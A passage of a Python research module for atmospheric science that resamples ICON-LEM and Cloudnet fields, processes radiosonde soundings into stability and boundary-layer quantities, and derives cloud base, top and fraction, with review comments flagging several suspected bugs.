    data: 22 July 2019 — author: Claudia Acquistapace
    output: dataframe at the desired time and height resolution
    """
    import pandas as pd
    # --- pass 1: resample along the time axis --------------------------
    source_df = pd.DataFrame(FieldStart, index=datetimeFieldStart, columns=heightFieldStart)
    matched_rows = getIndexList(source_df, ICON_DF.index)
    time_resampled = pd.DataFrame(np.zeros((len(ICON_DF.index), len(heightFieldStart))),
                                  index=ICON_DF.index, columns=heightFieldStart)
    time_resampled = getResampledDataPd(time_resampled, source_df, matched_rows)
    # --- pass 2: transpose and resample along the height axis ----------
    transposed_vals = time_resampled.values.transpose()
    transposed_df = pd.DataFrame(transposed_vals, index=heightFieldStart, columns=ICON_DF.index)
    matched_cols = getIndexList(transposed_df, ICON_DF_T.index)
    source_transposed = pd.DataFrame(transposed_vals, index=heightFieldStart, columns=ICON_DF.index)
    final_df = pd.DataFrame(np.zeros((len(ICON_DF.columns), len(ICON_DF.index))),
                            index=ICON_DF.columns, columns=ICON_DF.index)
    final_df = getResampledDataPd(final_df, source_transposed, matched_cols)
    return(final_df)
def f_downscaleScalarfield(scalarField, datetimehighRes, ICON_DF):
    """Downscale a high-resolution scalar time series to the ICON_DF grid.

    For every pair of consecutive coarse time stamps the nan-mean of the
    high-resolution samples strictly inside the interval is taken, so the
    output has len(ICON_DF.index) - 1 entries.
    date: 23 July 2019 — author: claudia Acquistapace (cacquist@meteo.uni-koeln.de)
    output: numpy array of the downscaled field

    NOTE: -99. entries are replaced with NaN in place, mutating the caller's
    array (same side effect as the original implementation).
    """
    coarse_times = ICON_DF.index
    scalarField[scalarField == -99.] = np.nan          # flag missing values
    highres_df = pd.DataFrame(scalarField, index=datetimehighRes)
    averaged = []
    for t_lo, t_hi in zip(coarse_times[:-1], coarse_times[1:]):
        inside = (highres_df.index > t_lo) & (highres_df.index < t_hi)
        averaged.append(np.nanmean(highres_df.values[inside]))
    return(np.array(averaged))
def f_downscalevectorfield(vectorField, datetimehighRes, heightField, ICON_DF):
    """Downscale a high-resolution (time, height) field to the ICON_DF grid.

    For each pair of consecutive coarse time stamps the column-wise nan-mean
    of the high-resolution rows strictly inside the interval is stored; the
    last output row is never written and stays zero (as in the original).
    date: 23 July 2019 — author: claudia Acquistapace (cacquist@meteo.uni-koeln.de)
    output: pandas dataframe (coarse time index, heightField columns)

    NOTE: -99. entries are replaced with NaN in place, mutating the caller's
    array (same side effect as the original implementation).
    """
    coarse_times = ICON_DF.index
    vectorField[vectorField == -99.] = np.nan
    highres_df = pd.DataFrame(vectorField, index=datetimehighRes, columns=heightField)
    downscaled = pd.DataFrame(np.zeros((len(coarse_times), len(heightField))),
                              index=coarse_times, columns=heightField)
    for row, (t_lo, t_hi) in enumerate(zip(coarse_times[:-1], coarse_times[1:])):
        in_interval = (highres_df.index > t_lo) & (highres_df.index < t_hi)
        downscaled.values[row, :] = np.nanmean(highres_df.values[in_interval, :], axis=0)
    return(downscaled)
def f_processRadiosondesDay(fileList, yy, mm, dd):
    """Process one day of radiosonde ascents and derive analysis quantities.

    For every sounding file the profile is read, T and Td are converted to
    Kelvin, and RH, CCL height/temperature, LCL height, LTS and EIS
    stability indices, virtual potential temperature and a Richardson-number
    based PBL height are derived.

    Parameters:
        fileList: paths of the radiosonde ascii files for the day (date and
            launch hour are parsed from fixed character positions of the path)
        yy, mm, dd: year, month, day of the processed day
    Returns:
        list of dicts, one per sounding, with keys 'time', 'P', 'T', 'Td',
        'Td_surf', 'RH', 'z_lcl', 'z_ccl', 'T_ccl', 'PBLheight', 'EISWood',
        'EIS2', 'LTS', 'theta_v', 'surfaceTemperature', 'height'.
    """
    # goal: process radiosoundings and calculating quantities of interest for the analysis
    # author: claudia Acquistapace
    # date; 24 July 2019 (heat wave in Cologne)
    # contact: cacquist@meteo.uni-koeln.de
    # output: list of dictionaries. Each dictionary is for a specific hour of the day
    # and contains 'time', 'P', T', 'Td', 'Td_surf','RH','z_lcl','z_ccl','T_ccl'
    # names of the variables in the radiosondes profiles
    # (column headers contain mojibake, e.g. 'Hˆhe' for 'Höhe' — kept verbatim
    # because they must match the files as read)
    cols = ['Zeit [min:sec]','P [hPa]','T [C]','U [%]','Wind speed [m/s]','Wdir [inf]','Lange [inf]'\
            ,'Breite [inf]','Hˆhe [m]','Geo Pot [m]', 'dew [C]', 'Tv [C]','Rs [m/s]', 'D [kg/m3]' \
            ,'Azimut []','Elevation []','Entfernung [m]']
    cols2 = ['Zeit [min:sec]','P [hPa]','T [C]','U [%]','Wind speed [m/s]','Wdir [inf]','Lange [inf]'\
            ,'Breite [inf]','Hˆhe [m]','Geo Pot [m]', 'dew [C]', 'Tv [C]','Rs [m/s]', 'D [kg/m3]']
    Nfiles = len(fileList)
    RadiosondesData = []
    for iFile in range(Nfiles):
        # NOTE(review): hard-coded character offsets assume a fixed-length path — TODO confirm for this dataset
        dayFile = fileList[iFile][44:52]
        hourFile = int(fileList[iFile][52:54])
        DatetimeRadiosonde = datetime.datetime(int(yy), int(mm), int(dd), hourFile, 0, 0)
        print(dayFile, hourFile)
        # the 2013-04-14 files have only 14 columns; all others have 17
        if dayFile == '20130414':
            #print('def correct for 14 columns')
            DF = pd.read_csv(fileList[iFile], sep='\t', skipinitialspace=True, \
                             encoding='latin_1', names=cols2, header=0, dtype={'Hˆhe [m]':str})
        else:
            #print('def correct for 17 columns')
            DF = pd.read_csv(fileList[iFile], sep='\t', skipinitialspace=True, \
                             encoding='latin_1', names=cols, header=0, dtype={'Hˆhe [m]':str})
        # coerce every column to numeric; unparsable entries become NaN
        DF[DF.columns] = DF[DF.columns].apply(pd.to_numeric, errors='coerce')
        #print(iFile, fileList[iFile], DF.dtypes)
        # ---- reading variables in the file
        P = DF.values[:,1] # in [hPa]
        T = DF.values[:,2]
        U = DF.values[:,3]
        Hwind = DF.values[:,4]
        Wdir = DF.values[:,5]
        Td = DF.values[:,10]
        # convert T and Td from Celsius to Kelvin
        Td = Td + 273.15
        T = T + 273.15
        height = DF.values[:,8]
# =============================================================================
#         for ind in range(len(height)):
#             #print(ind, height[ind])
#             height[ind] = height[ind].strip()
#             if height[ind] == '-----':
#                 height[ind] =np.nan
#                 height[ind] == float(height[ind])
#             else:
#                 height[ind] = float(height[ind].strip())
#
# =============================================================================
        #print(hourFile)
        Ndata = len(DF.count(axis='columns'))
        #print(DF.values[:,4])
        #type(DF.values[:,4])
        # ---- Calculating RH for radiosondes from Td (Td = 1/To - Rv/L log(e/eo)^-1) from stull
        # RH = e/es ; es is from clausius clapeyron while e is obtained from the formula for td
        e0 = 0.611 # Kpa
        T0 = 273.15 # K
        cost_lrv = 5423. # K (Lv/Rv)
        # NOTE(review): labelled J/Kg, but a typical latent heat of vaporization is ~2.5e6 J/kg — confirm this constant
        L = 5.6 * 10 ** 6 # J/Kg
        e = []
        es = []
        RH = []
        for indData in range(Ndata):
            e.append(e0 * np.exp(cost_lrv*(T0**(-1)-Td[indData]**(-1))))
            es.append(e0 * np.exp(cost_lrv*(T0**(-1)-T[indData]**(-1))))
            RH.append(100*(e0 * np.exp(cost_lrv*(T0**(-1)-Td[indData]**(-1))))/ \
                      (e0 * np.exp(cost_lrv*(T0**(-1)-T[indData]**(-1)))))
        # ---- finding height where RH = 100%
        ind_sat = []
        for indData in range(1,Ndata,+1):
            if ((RH[indData-1] < 100.) and (RH[indData] > 100.)):
                ind_sat = indData
                break
        #z_sat = height[ind_sat]
        # ---- calculating CCL from radiosoundings
        # ---- calculating the saturation mixing ratio for td at the surface (assuming RH =100%)
        # defining constants
        #cost_rvl = np.power(5423,-1.) #K
        Rv = 461 # J K^-1 Kg^-1
        epsilon = 0.622
        Td_surf = Td[0]
        P_surf = P[0]
        T_surf = T[0]
        # step 1: calculating due point temperature profile for each time was done at the previous step
        # step 2: calculating mixing ratio M0 at the surface for T = Td and P=Psurf
        # NOTE(review): the exponent uses (1./Rv) where the RH formulas above use cost_lrv (= Lv/Rv) — confirm which is intended
        M0 = epsilon*e0*np.exp((1./Rv)*(T0**(-1.)-Td_surf**(-1.))) / \
        (P_surf*0.1 - e0*np.exp((1./Rv)*(T0**(-1.)-Td_surf**(-1.))))
        # step 3: calculating Td(m=m0, P) for every P value and assigning Z_ccl when there's a level i of P for which
        # T(P)i-1 < Td(m0,P)i < T(P)i+1. If the level is found, assign T_star = T(P)i and Z_ccl as the height
        # corresponding to that pressure height.
        dimHeight = len(height)
        Tdm0_profile = np.zeros((dimHeight))
        Tdm0_profile.fill(np.nan)
        indCCLprofile = []
        for indHeight in range(dimHeight - 1):
            Pkpa = P[indHeight] * 0.1
            Tdm0_profile[indHeight] = 1 / (
                    (1 / T0) - ((1 / L) * Rv * np.log((M0 * Pkpa) / (e0 * epsilon))))
            # crossing direction depends on whether the surface is warmer than Td(m0)
            if T[0] > Tdm0_profile[indHeight]:
                if (T[indHeight] > Tdm0_profile[indHeight]) and (
                        T[indHeight + 1] < Tdm0_profile[indHeight]):
                    indCCLprofile.append(indHeight)
            else:
                if (T[indHeight] < Tdm0_profile[indHeight]) and (
                        T[indHeight + 1] > Tdm0_profile[indHeight]):
                    indCCLprofile.append(indHeight)
        #pathFig = '/work/cacquist/HDCP2_S2/statistics/figs/patch003/figures_JAMES/debugging/radiosondes/'
        #fig, ax = plt.subplots(figsize=(12, 5))
        #plt.plot(Tdm0_profile, height, label='TDm0')
        #plt.plot(T[:], height, label='T')
        #plt.legend()
        #plt.ylim(0, 6000)
        #plt.savefig(pathFig + str(dayFile) + '_' + str(hourFile) + 'radiosonde_Check.png', format='png')
        #print(len(indCCLprofile))
        # CCL = lowest crossing level; NaN when no crossing was found
        if len(indCCLprofile) == 0:
            z_ccl = np.nan
            T_cclTop = np.nan
        else:
            z_ccl = np.nanmin(height[indCCLprofile])
            T_cclTop = np.nanmin(T[np.nanargmin(height[indCCLprofile])])
        Ad_rate = -9.8 # K/Km (dry adiabatic lapse rate)
        T_ground_CCL = []  # NOTE(review): immediately overwritten below — dead assignment
        # ---- finding z(CCL) using the dry adiabatic lapse rate
        T_ground_CCL = float(T_cclTop) - Ad_rate* float(z_ccl)*10.**(-3)
        # ---- calculating LCL height
        #------ calculating LCL heights from tower measurements resampled
        # important: provide pressure in Pascals, T in K, RH as a fraction (RH[0] is a percentage, e.g. 70.3, hence the /100.)
        #---------------------------------------------------------------------------------
        from myFunctions import lcl
        z_lcl = lcl(np.array(P_surf*100),np.array(T_surf),np.array(RH[0])/100.)
        # ------------------------------------------------------------------
        # calculate LTS index for lower tropospheric stability (Wood and Bretherton, 2006)
        # ------------------------------------------------------------------
        from myFunctions import f_closest
        Pthr = 700 * 100. # Pressure level of 700 Hpa used as a reference
        # calculating height of the surface
        indP700 = f_closest(P*100.,Pthr)
        Theta = []
        Cp = 1004.
        Rl = 287.
        for ind in range(len(height)):
            Theta.append(T[ind]*((100000./(P[ind]*100.))**(Rl/Cp))) # potential temperature in K
        LTS = Theta[indP700] - Theta[0]
        #------------------------------------------------------------------
        # calculate EIS index for lower tropospheric stability (Wood and Bretherton, 2006) for observations
        # ------------------------------------------------------------------
        g = 9.8 # gravitational constant [ms^-2]
        Cp = 1005.7 # specific heat at constant pressure of air [J K^-1 Kg^-1]
        Lv = 2256 # latent heat of vaporization of water [kJ/kg]
        R = 8.314472 # gas constant for dry air [J/ molK]
        epsilon = 0.622 # ratio of the gas constants of dry air and water vapor
        # ---- calculating mixing ratio
        mr =[]
        for indHeight in range(len(height)):
            mr.append((0.622*e[indHeight]*100.)/(P[indHeight]*100.-e[indHeight]*100.)) # water vapor mixing ratio in kg/kg
        # ---- calculating saturation mixing ratio
        ws = [] #mpcalc.saturation_mixing_ratio(P, T)
        for indHeight in range(len(height)):
            ws.append(epsilon* (es[indHeight]/(P[indHeight]- es[indHeight]))) # saturation water vapor mixing ratio kg/Kg
        gamma_moist = []
        gamma_moist_atmos = []
        # calculating moist adiabatic lapse rate
        for indHeight in range(len(height)):
            gamma_moist.append(g*((1.+(Lv*mr[indHeight])/(R*T[indHeight]))/(Cp \
                        + (mr[indHeight]*epsilon*Lv**2)/(R*T[indHeight]**2))))
        # cross-check of the lapse rate with the third-party 'atmos' package
        Ws_array = np.asarray(ws)
        T_array = np.asarray(T)
        gamma_moist_atmos = atmos.equations.Gammam_from_rvs_T(Ws_array.astype(float), T_array.astype(float))
        indP700 = f_closest(P*100.,Pthr)
        gamma_moist_700 = gamma_moist[indP700]
        z_700 = height[indP700]
        #print('here')
        #print(float(z_lcl))
        #for ind in range(len(height)):
        #    print((height[ind]))
        #print(f_closest(height, float(z_lcl)))
        ind_lcl = f_closest(height, float(z_lcl))
        gamma_lcl = gamma_moist[ind_lcl]
        # finding height corresponding to 700 HPa
        EIS = LTS - gamma_moist_700*z_700 + gamma_lcl*float(z_lcl)
        EIS_atmos = LTS - gamma_moist_atmos[indP700]*z_700 + gamma_moist_atmos[ind_lcl]*float(z_lcl)
        #print('EIS obtained from the Wood and Bretherton formula:')
        #print(EIS)
        # calculating profiles of virtual potential temperature
        Theta_v = []
        Rd = 287.058 # gas constant for dry air [Kg-1 K-1 J]
        for indHeight in range(len(height)):
            k = Rd*(1-0.23*mr[indHeight])/Cp
            Theta_v.append( (1 + 0.61 * mr[indHeight]) * T[indHeight] * (1000./P[indHeight])**k)
        # calculating EIS with the methodology of maximum deltaTheta_v
        Delta_ThetaV = [x - Theta_v[i - 1] for i, x in enumerate(Theta_v)][1:]
        # cutting profiles at 4000mt height
        indCut = f_closest(height, 3500.)
        Delta_ThetaV= Delta_ThetaV[0:indCut]
        #print('il massimo shift risulta :')
        #print(np.max(Delta_ThetaV))
        #print(np.argmax(Delta_ThetaV))
        EIS_height = height[np.argmax(Delta_ThetaV)]
        #print('e si trova ad altezza:')
        #print(EIS_height)
        EIS2 = Theta_v[np.argmax(Delta_ThetaV)]- Theta_v[0]
        #print('EIS obtained with the maximum deltaTheta virtual difference:')
        #print(EIS2)
        #print('da qui')
        # ------------------------------------------------------------------------------
        # calculating PBL height
        # ------------------------------------------------------------------------------
        dimHeight = len(height)
        g=9.8                   # gravity constant
        Rithreshold=0.25        # Threshold values for Ri
        Rithreshold2=0.2        # NOTE(review): only referenced in commented-out code below
        zs=height[0]            # height of the surface reference
        RiMatrix=np.zeros((dimHeight))  # Richardson number matrix
        PBLheightArr=[]
        RiCol=np.zeros((dimHeight))
        # calculating richardson number matrix
        thetaS=Theta_v[0]
        for iHeight in range(dimHeight):
            # the wind-speed column may hold floats or placeholder strings
            if isinstance((DF.values[iHeight,4]), float):
                den = DF.values[iHeight,4]**2
            if isinstance((DF.values[iHeight,4]), str):
                if (DF.values[iHeight,4] == '----- '):
                    den == 0.  # NOTE(review): '==' is a comparison, not an assignment — 'den' keeps its previous value; likely meant 'den = 0.'
                else:
                    den = (float(DF.values[iHeight,4].strip()))**2
            if den == 0.:
                RiMatrix[iHeight] = 0.
            else:
                RiMatrix[iHeight] = (1/den) * (g/thetaS) * (Theta_v[iHeight]-thetaS)*(height[iHeight]-zs)
        # find index in height where Ri > Rithreshold
        RiCol=RiMatrix[:]
        # averaging lowest 100 mt of Ri matrix values
        indHeightMean = np.where(height < 100.)
        RImeanval = np.nanmean(RiCol[indHeightMean])
        # NOTE(review): len(indHeightMean) is the length of the np.where tuple (always 1), not the number of selected heights — the assignment relies on broadcasting
        RiCol[indHeightMean] = np.repeat(RImeanval, len(indHeightMean))
        #print(RiCol)
        #print(np.where(RiCol > Rithreshold2)[0][:])
        #print(len(np.where(RiCol > Rithreshold)[0][:]))
        # PBL height = first level (above surface) where Ri exceeds the threshold
        if len(np.where(RiCol > Rithreshold)[0][:]) != 0:
            PBLheight = (height[np.where(RiCol > Rithreshold)[0][0]] - height[0])
        else:
            PBLheight = 0.
        # ---- saving variables in dictionary: every dictionary for one hour
        dict_day = {
                'time':DatetimeRadiosonde,
                'P':P,
                'T':T,
                'Td': Td,
                'Td_surf': Td[0],
                'RH':RH,
                'z_lcl':z_lcl,
                'z_ccl':z_ccl,
                'T_ccl':T_ground_CCL,
                'PBLheight':PBLheight,
                'EISWood':EIS,
                'EIS2':EIS2,
                'LTS':LTS,
                'theta_v':Theta_v,
                'surfaceTemperature':T_surf,
                'height':height,
                }
        # appending to a list: the list is for the day
        RadiosondesData.append(dict_day)
    return(RadiosondesData)
def f_calcThermodynamics(P,Q,T, LTS, time, height, Hsurf, date):
    """
    Derive thermodynamic quantities of interest for the analysis.

    author : Claudia Acquistapace
    date   : 25 July 2019 (heat wave in Cologne)
    contact: cacquist@meteo.uni-koeln.de

    Parameters
    ----------
    P      : pressure matrix (time, height) [Pa]
    Q      : absolute humidity matrix (time, height) [kg/kg]
    T      : temperature matrix (time, height) [K]
    LTS    : lower tropospheric stability (passed through to the output)
    time   : time array
    height : height array
    Hsurf  : height of the surface (not used inside this function)
    date   : date string, forwarded to f_CCL_new

    Returns
    -------
    dict with keys:
        'mixingRatio', 'relativeHumidity', 'virtualTemperature',
        'cclHeight', 'cclTemperature', 'lclHeight', 'surfaceTemperature',
        'virtualPotentialTemperature', 'potentialTemperature',
        'time', 'height', 'LTS'
    """
    r = np.zeros((len(time), len(height)))
    rh = np.zeros((len(time), len(height)))
    tv = np.zeros((len(time), len(height)))
    # calculation of mixing ratio and relative humidity
    # rh formula: RH[%] = 0.263 * p * q / exp(17.67 (T-T0)/(T-29.65))
    T0 = 273.15
    for iTime in range(len(time)):
        for iHeight in range(len(height)):
            r[iTime,iHeight] = (Q[iTime, iHeight])/(1-Q[iTime, iHeight])
            rh[iTime,iHeight] = 0.263*P[iTime, iHeight] * \
            Q[iTime, iHeight] * (np.exp( 17.67 * (T[iTime, iHeight]-T0) / (T[iTime, iHeight] - 29.65)))**(-1)
    #print('RH', rh[0,0], rh[0,-1])
    #print('pressure ' , P[0,0]*0.001, P[0,-1]*0.001)
    #print('temp', T[0,0], T[0,-1])
    # calculation of virtual temperature: Tv = T (1 + 0.608 q)
    # NOTE(review): the loop stops at index 1, so tv[:,0] is left at zero —
    # confirm this is intentional (level 0 may be above the model top here).
    for indH in range(len(height)-1, 0, -1):
        tv[:,indH] = T[:,indH]*(1+0.608 * Q[:,indH])
    # calculation of convective condensation level (CCL) height and temperature
    from myFunctions import f_CCL_new # input variables: T, P, RH, height, time, date
    # (provide temperature in K, RH in % (e.g. 70.14), P in kPa)
    result_ccl = f_CCL_new(T, P*0.001, rh, height, time, date)
    #print(result_ccl['z_ccl'])
    # DatasetOut = {'time':time,
    #              'height':height,
    #              'z_ccl':z_ccl,
    #              'T_ground_ccl':T_ground_CCL,
    #              'T_top_ccl':T_cclTop,
    #              'T_dew':Td}
    from myFunctions import lcl # T in K and P in pascal
    # surface values: last height index is the lowest level (height decreasing)
    indSurf = len(height)-1
    PSurf = P[:,indSurf]
    TSurf = T[:,indSurf] # T in K
    # NOTE(review): rhSurf is read at indSurf-1 while P/T use indSurf —
    # confirm this one-level offset is intended and not an off-by-one.
    rhSurf = rh[:,indSurf-1]
    lclArray = []
    for iTime in range(len(time)):
        lclArray.append(lcl(PSurf[iTime],TSurf[iTime],rhSurf[iTime]/100.))
    # calculation of potential and virtual potential temperature (P in pascal)
    Rd = 287.058 # gas constant for dry air [Kg-1 K-1 J]
    Cp = 1004.
    Theta = np.zeros((len(time), len(height)))
    Theta_v = np.zeros((len(time), len(height)))
    for indTime in range(len(time)):
        for indHeight in range(len(height)):
            # humidity-corrected Poisson exponent k = Rd (1 - 0.23 r)/Cp
            k_val = Rd*(1-0.23*r[indTime, indHeight])/Cp
            Theta_v[indTime, indHeight] = ( (1 + 0.61 * r[indTime, indHeight]) * \
            T[indTime, indHeight] * (100000./P[indTime, indHeight])**k_val)
            Theta[indTime, indHeight] = T[indTime, indHeight] * (100000./P[indTime, indHeight])**k_val
    ThermodynPar={'mixingRatio':r,
                  'relativeHumidity':rh,
                  'virtualTemperature':tv,
                  'cclHeight':result_ccl['z_ccl'],
                  'cclTemperature':result_ccl['T_ground_ccl'],
                  'lclHeight':lclArray,
                  'surfaceTemperature':TSurf,
                  'virtualPotentialTemperature':Theta_v,
                  'potentialTemperature':Theta,
                  'time':time,
                  'height':height,
                  'LTS':LTS,
                  }
    return(ThermodynPar)
# =============================================================================
# OBSOLETE FUNCTION >> Calculation of variance, wind speed, with direction for model outputs
# are done in the f_processModelOutput.py function
# def f_calcDynamics(w,u,v,thetaV,time,height,timeWindow):
#
# # calculating variance of vertical velocity
# from myFunctions import f_calcWvariance
# #print('calculating variance of vertical velocity for observations')
# varW = f_calcWvariance(w,time,height,timeWindow)
#
# #print('Calculating PBL height with Richardson number method')
# from myFunctions import f_calcPblHeightRN
# PBLHeightArr = f_calcPblHeightRN(thetaV,u,v,height,time)
#
# # calculation of wind direction and intensity for model output
# windData_ICON = f_calcWindSpeed_Dir(time, height, v, u)
# #print('wind speed and direction calculated for ICON-LEM ')
#
# DynPar={'varianceW':varW,
# 'PBLHeight':PBLHeightArr,
# 'windSpeed':windData_ICON['windSpeed'],
# 'windDirection':windData_ICON['windDirection'],
# }
# return(DynPar)
#
# =============================================================================
def f_resamplingMatrixCloudnet(time2change, height2change, matrix2change, timeRef, heightRef, matrixRef):
    """
    Resample a Cloudnet (time, height) matrix onto the ICON time/height grid.

    The regridding runs in two passes: first the rows of `matrix2change` are
    resampled onto the reference time axis `timeRef`, then the intermediate
    result is transposed and its columns are resampled onto the reference
    height axis `heightRef`, using the getIndexList/getResampledDataPd helpers.

    Returns a numpy masked array on the (heightRef, timeRef) grid, with NaN
    entries masked.
    """
    # pass 1: reference dataframe on the ICON grid, used to pick matching times
    ICON_DF = pd.DataFrame(matrixRef, index=timeRef, columns=heightRef)
    print('resampling CLOUDNET observations on ICON time resolution')
    source_DF = pd.DataFrame(matrix2change, index=time2change, columns=height2change)
    selectedRows = getIndexList(source_DF, ICON_DF.index)
    timeRegridded_DF = pd.DataFrame(np.empty((len(timeRef), len(height2change))),
                                    index=timeRef, columns=height2change)
    timeRegridded_DF = getResampledDataPd(timeRegridded_DF, source_DF, selectedRows)
    # pass 2: transpose so that height becomes the index, then regrid heights
    ICON_DF_T = pd.DataFrame(matrixRef.transpose(), index=heightRef, columns=timeRef)
    regriddedVals = timeRegridded_DF.values.transpose()
    coarse_DF = pd.DataFrame(regriddedVals, index=height2change, columns=timeRef)
    selectedCols = getIndexList(coarse_DF, ICON_DF_T.index)
    # coarse-resolution source and fine-resolution target dataframes
    coarseSource_DF = pd.DataFrame(regriddedVals, index=height2change, columns=timeRef)
    fine_DF = pd.DataFrame(np.empty((len(heightRef), len(timeRef))),
                           index=heightRef, columns=timeRef)
    fine_DF = getResampledDataPd(fine_DF, coarseSource_DF, selectedCols)
    # mask the gaps introduced by the regridding
    return(np.ma.array(fine_DF.values, mask=np.isnan(fine_DF.values)))
def _f_deriveLowestCBCT(time, clouds, PBLclouds):
    """
    Derive time series of the lowest PBL cloud base and its matching cloud top.

    For each time stamp of `clouds` that also appears in `PBLclouds`
    (both produced by f_calculateCloudBaseTopThickness), the minimum non-nan
    cloud base is selected together with the cloud top at the same level index.
    Time stamps without PBL clouds are left at nan.

    Returns
    -------
    (CBarr, CTarr) : two 1-d numpy arrays of length len(time), nan-filled
                     where no PBL cloud base/top is defined.
    """
    CBarr = np.zeros(len(time))
    CBarr.fill(np.nan)
    CTarr = np.zeros(len(time))
    CTarr.fill(np.nan)
    iPBL = 0
    for itime in range(len(time)):
        if iPBL < len(PBLclouds.time.values):
            if clouds.time.values[itime] == PBLclouds.time.values[iPBL]:
                CBarray = PBLclouds.cloudBase.values[iPBL, :]
                # proceed only if at least one non-nan cloud base exists at this time
                if CBarray.size - np.count_nonzero(np.isnan(CBarray)) != 0:
                    minCB = np.nanmin(PBLclouds.cloudBase.values[iPBL, :])
                    CBarr[itime] = minCB
                    indexLevelMin = np.nanargmin(PBLclouds.cloudBase.values[iPBL, :])
                    CTarr[itime] = PBLclouds.cloudTop[iPBL, indexLevelMin]
                else:
                    CBarr[itime] = np.nan
                    CTarr[itime] = np.nan
                iPBL = iPBL + 1
    return (CBarr, CTarr)
def f_calculateAllCloudQuantities(CloudInfo, \
                                  time, \
                                  height, \
                                  LWP, \
                                  LWC, \
                                  humanInfo, \
                                  Hwind, \
                                  Wwind, \
                                  yy, \
                                  dd, \
                                  mm, \
                                  QiThreshold, \
                                  QcThreshold, \
                                  iconLemData, \
                                  device, \
                                  verboseFlag, \
                                  debuggingFlag, \
                                  pathDebugFig):
    """
    @ author  : Claudia Acquistapace
    @ date    : 30 July 2019, modified 11 November 2019
    @ contact : cacquist@meteo.uni-koeln.de
    @ goal    : calculate cloud base, cloud top, cloud fraction and cloud mask
                in the same way for observations and model output, identify
                cloud units and derive, for every cloud: duration, chord
                length, mass flux and cloud LWP/LWC.
    @ input   :
        - CloudInfo : cloudnet target categorization (obs) or cloud mask (model)
        - time, height : coordinate arrays
        - LWP       : liquid water path time serie
        - LWC       : reflectivity in linear scale when processing observations;
                      Qc matrix when processing ICON-LEM output
        - humanInfo : start/end times of the PBL cloud period of the day
        - Hwind, Wwind : horizontal / vertical wind matrices (time, height)
        - yy, dd, mm   : date components (note the order: year, day, month)
        - QiThreshold, QcThreshold : thresholds for Qi / Qc in model output
        - iconLemData  : data structure containing iconlem extracted variables
        - device    : 'obs' or 'iconlem'
        - verboseFlag, debuggingFlag, pathDebugFig : diagnostics controls
    @ output  : (dictOut, clouds, PBLclouds) where dictOut contains the cloud
                mask, 30-min mean cloud fraction profiles (liquid/ice/total),
                and per-cloud arrays of duration, LWP, LWC, chord length,
                mass flux, mean CB/CT, updraft at cloud base, and Nclouds.
    """
    from myFunctions import f_cloudmask
    from myFunctions import f_calcCloudBaseTopPBLcloudsV2
    from myFunctions import f_calcCloudBaseTopPBLclouds
    from myFunctions import f_closest
    from myFunctions import f_calculateCloudFractionICON
    from myFunctions import f_calculateCloudProperties
    from cloudnetFunctions import f_calculateCloudFractionCloudnet
    from cloudnetFunctions import f_calculateCloudMaskCloudnet
    from myFunctions import f_plotTest
    date = str(yy)+str(mm)+str(dd)
    # observation branch: derive cloud mask / cloud fraction from the cloudnet
    # categorization, filter linear reflectivity between CB and CT and obtain
    # LWC with the Frisch approach
    if device == 'obs':
        stringData = 'obs'
        # calculating cloud mask for obs
        CategoryCN_res = CloudInfo.data
        cloudMask = f_calculateCloudMaskCloudnet(time, height, \
                                                 CategoryCN_res.transpose().astype(int))
        #PLOTDONE1 = f_plotTest(cloudMask.transpose(), time, height, 'pre_call')
        # calculating 30 min mean profiles of cloud fraction for observations
        cloudFraction = f_calculateCloudFractionCloudnet(CategoryCN_res,\
                                                         yy, mm, dd, time, height)
        # for observations the LWC input actually carries Ze in linear scale
        Ze_lin = LWC
        # cloud base, top and thickness for all clouds and for PBL clouds
        clouds, PBLclouds = f_calculateCloudBaseTopThickness(cloudMask, time, height, humanInfo)
        # lowest PBL cloud base and corresponding cloud top (shared helper,
        # previously duplicated verbatim in both branches)
        CBarr, CTarr = _f_deriveLowestCBCT(time, clouds, PBLclouds)
        # filtering Ze linear between cloud base and cloud top
        for indT in range(len(time)):
            ZE_lin_DF = pd.Series(Ze_lin[indT,:], index=height)
            if (~np.isnan(CBarr[indT])):
                mask_CB = (ZE_lin_DF.index < CBarr[indT])
                ZE_lin_DF[mask_CB] = np.nan
            else: # case in which cloud base is nan (excluded clouds or no clouds)
                ZE_lin_DF[:] = np.nan
            if (~np.isnan(CTarr[indT])):
                mask_CT = (ZE_lin_DF.index > CTarr[indT])
                ZE_lin_DF[mask_CT] = np.nan
            else: # case in which cloud top is nan (excluded clouds or no clouds)
                ZE_lin_DF[:] = np.nan
            # copying values from the selection in the matrix
            Ze_lin[indT,:] = ZE_lin_DF.values
        # calculating LWC matrix adopting Frisch approach using Ze and LWP
        deltaZ = 30. # range gate resolution of JOYRAD35 in meters
        LWC = f_calculateLWCFrisch(Ze_lin, deltaZ, time, \
                                   height, LWP)
        if verboseFlag == 1:
            print('cloud base, cloud top, cloud fraction and cloud mask calculated for observation')
            print('filtering Ze linear values between cloud base and cloud top (PBL) for each time, \
            removed values of Ze for clouds excluded from the data')
            print('calculating LWC with Frisch approach from Ze for observations')
    # model branch: cloud mask from Qc/Qi thresholds, cloud fraction from ICON
    if device == 'iconlem':
        stringData = 'iconlem'
        Qi = iconLemData.groups['Temp_data'].variables['Qi'][:].copy()
        Qc = iconLemData.groups['Temp_data'].variables['Qc'][:].copy()
        # calculating cloud mask
        cloudMask = f_cloudmask(time,height,Qc,Qi,QiThreshold,QcThreshold)
        # cloud base, top and thickness for all clouds and for PBL clouds
        clouds, PBLclouds = f_calculateCloudBaseTopThickness(cloudMask, time, height, humanInfo)
        # lowest PBL cloud base and corresponding cloud top (shared helper)
        CBarr, CTarr = _f_deriveLowestCBCT(time, clouds, PBLclouds)
        # calculating 30 min mean profiles of cloud fraction for ICON-LEM
        cloudFraction = f_calculateCloudFractionICON(Qi, Qc, \
                                                     yy, mm, dd, time, height, QiThreshold, QcThreshold)
        LWC = Qc
        if verboseFlag == 1:
            print('cloud fraction and cloud mask calculated for model output')
    # --------------------------------------------------------------------
    # common processing for obs and model data, based on the variables above
    # --------------------------------------------------------------------
    # 30-min mean cloud fraction profiles
    mean_CF_liquid = cloudFraction['LiquidCloudFraction']
    mean_CF_ice = cloudFraction['IceCloudFraction']
    mean_CF_tot = cloudFraction['TotalCloudFraction']
    datetime_CF = cloudFraction['time']
    # updraft speed at cloud base (vertical wind at the closest height level)
    UpdraftCB = np.zeros(len(time))
    UpdraftCB.fill(np.nan)
    for indT in range(len(time)):
        if (~np.isnan(CBarr[indT])):
            indCB = f_closest(height, CBarr[indT])
            UpdraftCB[indT] = Wwind[indT,indCB]
    # cloud duration, chord length, mass flux and mean LWP per cloud unit
